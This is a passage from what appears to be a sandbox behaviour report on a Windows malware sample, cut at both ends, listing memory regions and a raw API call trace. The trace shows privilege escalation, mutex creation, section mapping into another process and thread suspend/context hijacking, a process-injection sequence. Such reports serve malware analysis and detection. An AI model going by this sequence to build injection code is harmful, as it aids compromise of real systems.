"private_0x0000000000580000" filename = "" Region: id = 10100 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 10101 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 10102 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10103 start_va = 0xc80000 end_va = 0xe08fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 10502 start_va = 0xd0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10503 start_va = 0x160000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 10504 start_va = 0x76b00000 end_va = 0x76bfffff monitored = 0 entry_point = 0x76b1b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10522 start_va = 0x771a0000 end_va = 0x7722ffff monitored = 0 entry_point = 0x771b6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10523 start_va = 0x76520000 end_va = 0x76529fff monitored = 0 entry_point = 0x765236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 10524 start_va = 0x753c0000 end_va = 0x7545cfff monitored = 0 entry_point = 0x753f3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 10525 start_va = 0x200000 end_va = 0x21dfff monitored = 0 entry_point = 0x21158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10526 start_va = 0xe10000 end_va = 0xf97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 10527 start_va = 0x200000 end_va = 0x21dfff monitored = 0 entry_point = 0x21158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10528 start_va = 0x76e50000 end_va = 0x76eaffff monitored = 0 entry_point = 0x76e6158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10529 start_va = 0x769e0000 end_va = 0x76aabfff monitored = 0 entry_point = 0x769e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10530 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10531 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10532 start_va = 0xfa0000 end_va = 0x1120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 10533 start_va = 0x1130000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 10534 start_va = 0x330000 end_va = 0x358fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 10536 start_va = 0x20000 end_va = 0x29fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Thread: id = 72 os_tid = 0x340 [0262.493] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x32f21c | out: HeapArray=0x32f21c*=0x480000) returned 0x1 [0262.499] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x32f1cc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.501] NtCreateFile (in: FileHandle=0x32f1ec, DesiredAccess=0x120089, ObjectAttributes=0x32f1b4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x32f1d4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x32f1ec*=0x20, IoStatusBlock=0x32f1d4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0262.509] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x483208) returned 1 [0262.513] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0x32f1d4, FileInformation=0x32f12c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x32f1d4, FileInformation=0x32f12c) returned 0x0 [0262.519] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13bb40) returned 0x580020 [0262.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x32f16c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.633] NtCreateFile (in: FileHandle=0x32f18c, DesiredAccess=0x120089, ObjectAttributes=0x32f154*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x32f174, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x32f18c*=0x20, IoStatusBlock=0x32f174*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0262.634] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x483208) returned 1 [0262.634] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0x32f174, FileInformation=0x32eee8, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x32f174, FileInformation=0x32eee8) returned 0x0 [0262.634] NtClose (Handle=0x20) returned 0x0 [0262.634] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x208) returned 0x483208 [0262.634] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x483208) returned 1 [0262.637] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x73f31320, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x32f1a8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x32f1a8*(BaseAddress=0x73f31000, AllocationBase=0x73f30000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0262.958] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x32f200, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x32f200, ResultLength=0x0) returned 0x0 [0262.961] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x32f224, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x32f224, ReturnLength=0x0) returned 0x0 [0262.968] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x6c0020) returned 1 [0262.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x32eeb4*=0x0, ZeroBits=0x0, RegionSize=0x32eeb8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x32eeb4*=0x20000, RegionSize=0x32eeb8*=0x10000) returned 0x0 [0262.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0263.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x32f214*=0x20000, RegionSize=0x32f218, FreeType=0x8000) returned 0x0 [0263.014] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x32efd0 | out: Value="kEecfMwgj") returned 0x0 [0263.014] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x32f040 | out: BaseAddress=0x32f040*=0x765e0000) returned 0x0 [0263.029] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x32f22c | out: TokenHandle=0x32f22c*=0x40) returned 0x0 [0263.036] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x32f220 | out: lpLuid=0x32f220*(LowPart=0x14, HighPart=0)) returned 1 [0263.044] NtAdjustPrivilegesToken (in: TokenHandle=0x40, DisableAllPrivileges=0, NewState=0x32f21c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0263.045] NtClose (Handle=0x40) returned 0x0 [0263.046] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x32eb60 | out: Value="kEecfMwgj") returned 0x0 [0263.049] NtOpenDirectoryObject (in: FileHandle=0x32f020, DesiredAccess=0x2000f, ObjectAttributes=0x32efec*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x32f020*=0x40) returned 0x0 [0263.051] NtCreateMutant (in: MutantHandle=0x32f24c, DesiredAccess=0x1f0001, ObjectAttributes=0x32efd4*(Length=0x18, RootDirectory=0x40, ObjectName="62AQ09U8C34JCCAZ", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x32f24c*=0x88) returned 0x0 [0263.051] NtClose (Handle=0x40) returned 0x0 [0263.051] NtClose (Handle=0x88) returned 0x0 [0263.051] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x32e5e4 | out: Value="kEecfMwgj") returned 0x0 [0263.061] RtlSetEnvironmentVariable (in: Environment=0x0, Name="62AQ09U8", Value="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe" | out: Environment=0x0) returned 0x0 [0263.063] NtCreateSection (in: SectionHandle=0x32ecf8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x32ea98, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x32ecf8*=0x88) returned 0x0 [0263.065] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x32ecfc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32ea98*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32ecfc*=0x130000, SectionOffset=0x0, ViewSize=0x32ea98*=0x29000) returned 0x0 [0263.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x32e400*=0x0, ZeroBits=0x0, RegionSize=0x32e404*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x32e400*=0x20000, RegionSize=0x32e404*=0x10000) returned 0x0 [0263.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0263.072] NtOpenProcess (in: ProcessHandle=0x32ea54, DesiredAccess=0x438, ObjectAttributes=0x32ea74*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x32ea48*(UniqueProcess=0x454, UniqueThread=0x0) | out: ProcessHandle=0x32ea54*=0x40) returned 0x0 [0263.072] NtQueryInformationProcess (in: ProcessHandle=0x40, ProcessInformationClass=0x1a, ProcessInformation=0x32e760, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x32e760, ReturnLength=0x0) returned 0x0 [0263.072] NtCreateSection (in: SectionHandle=0x32e3fc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x32e3bc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x32e3fc*=0x8c) returned 0x0 [0263.072] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x32e404*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32e3bc*=0x188c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32e404*=0xc80000, SectionOffset=0x0, ViewSize=0x32e3bc*=0x189000) returned 0x0 [0263.082] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x40, BaseAddress=0x32e400*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x32e3f8*=0x188c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x32e400*=0x7530000, SectionOffset=0x0, ViewSize=0x32e3f8*=0x189000) returned 0x0 [0263.134] NtClose (Handle=0x8c) returned 0x0 [0263.139] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2000) returned 0x494230 [0263.140] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x32e0c8 | out: TokenHandle=0x32e0c8*=0x8c) returned 0x0 [0263.143] NtQueryInformationToken (in: TokenHandle=0x8c, TokenInformationClass=0x1, TokenInformation=0x32d8c0, TokenInformationLength=0x400, ReturnLength=0x32e0c0 | out: TokenInformation=0x32d8c0, ReturnLength=0x32e0c0) returned 0x0 [0263.144] ConvertSidToStringSidW (in: Sid=0x32d8c8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x32e0c4 | out: StringSid=0x32e0c4*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0263.144] NtClose (Handle=0x8c) returned 0x0 [0263.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x32e338*=0x0, ZeroBits=0x0, RegionSize=0x32e33c*=0x10646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x32e338*=0xd0000, RegionSize=0x32e33c*=0x11000) returned 0x0 [0263.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x32e324*=0x0, ZeroBits=0x0, RegionSize=0x32e328*=0x10646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x32e324*=0x160000, RegionSize=0x32e328*=0x11000) returned 0x0 [0263.150] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x32e338*=0x41d5a6, NumberOfBytesToProtect=0x32e33c, NewAccessProtection=0x40, OldAccessProtection=0x32e384 | out: BaseAddress=0x32e338*=0x41d000, NumberOfBytesToProtect=0x32e33c, OldAccessProtection=0x32e384*=0x40) returned 0x0 [0263.150] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x494230) returned 1 [0263.157] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x32e130, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.159] NtCreateFile (in: FileHandle=0x32e150, DesiredAccess=0x120089, ObjectAttributes=0x32e118*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x32e138, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x32e150*=0x8c, IoStatusBlock=0x32e138*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0263.159] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x4807f0) returned 1 [0263.162] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x32e138, FileInformation=0x32deac, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x32e138, FileInformation=0x32deac) returned 0x0 [0263.162] NtClose (Handle=0x8c) returned 0x0 [0263.162] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x208) returned 0x4807f0 [0263.162] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x4807f0) returned 1 [0263.170] NtOpenProcess (in: ProcessHandle=0x32e338, DesiredAccess=0x438, ObjectAttributes=0x32d8e8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x32d928*(UniqueProcess=0x454, UniqueThread=0x0) | out: ProcessHandle=0x32e338*=0x8c) returned 0x0 [0263.173] NtQueryInformationProcess (in: ProcessHandle=0x8c, ProcessInformationClass=0x0, ProcessInformation=0x32d938, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x32d938, ReturnLength=0x0) returned 0x0 [0263.178] NtOpenThread (in: ThreadHandle=0x32d8e0, DesiredAccess=0x1a, ObjectAttributes=0x32d8e8, ClientId=0x32d918*(UniqueProcess=0x0, UniqueThread=0x458) | out: ThreadHandle=0x32d8e0*=0x90) returned 0x0 [0263.182] NtSuspendThread (in: ThreadHandle=0x90, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0263.201] NtGetContextThread (in: ThreadHandle=0x90, Context=0x32de30 | out: Context=0x32de30*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x11, [66]=0xe1, [67]=0x3, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x11, [74]=0xe1, [75]=0x3, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x1, SegGs=0x0, SegFs=0x2514900, SegEs=0x0, SegDs=0x28f588, Edi=0x0, Esi=0x100ec, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0xff0e5b60, SegCs=0x7fe, EFlags=0x7, Esp=0x0, SegSs=0x3eab150, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x1, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x3a, [45]=0x93, [46]=0x42, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x20, [213]=0x10, [214]=0x49, [215]=0x2, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x1, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x58, [245]=0xc1, [246]=0x4e, [247]=0x2, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x96, [261]=0x23, [262]=0xd2, [263]=0xfe, [264]=0xfe, [265]=0x7, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0263.206] NtSetContextThread (ThreadHandle=0x90, Context=0x32de30*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, 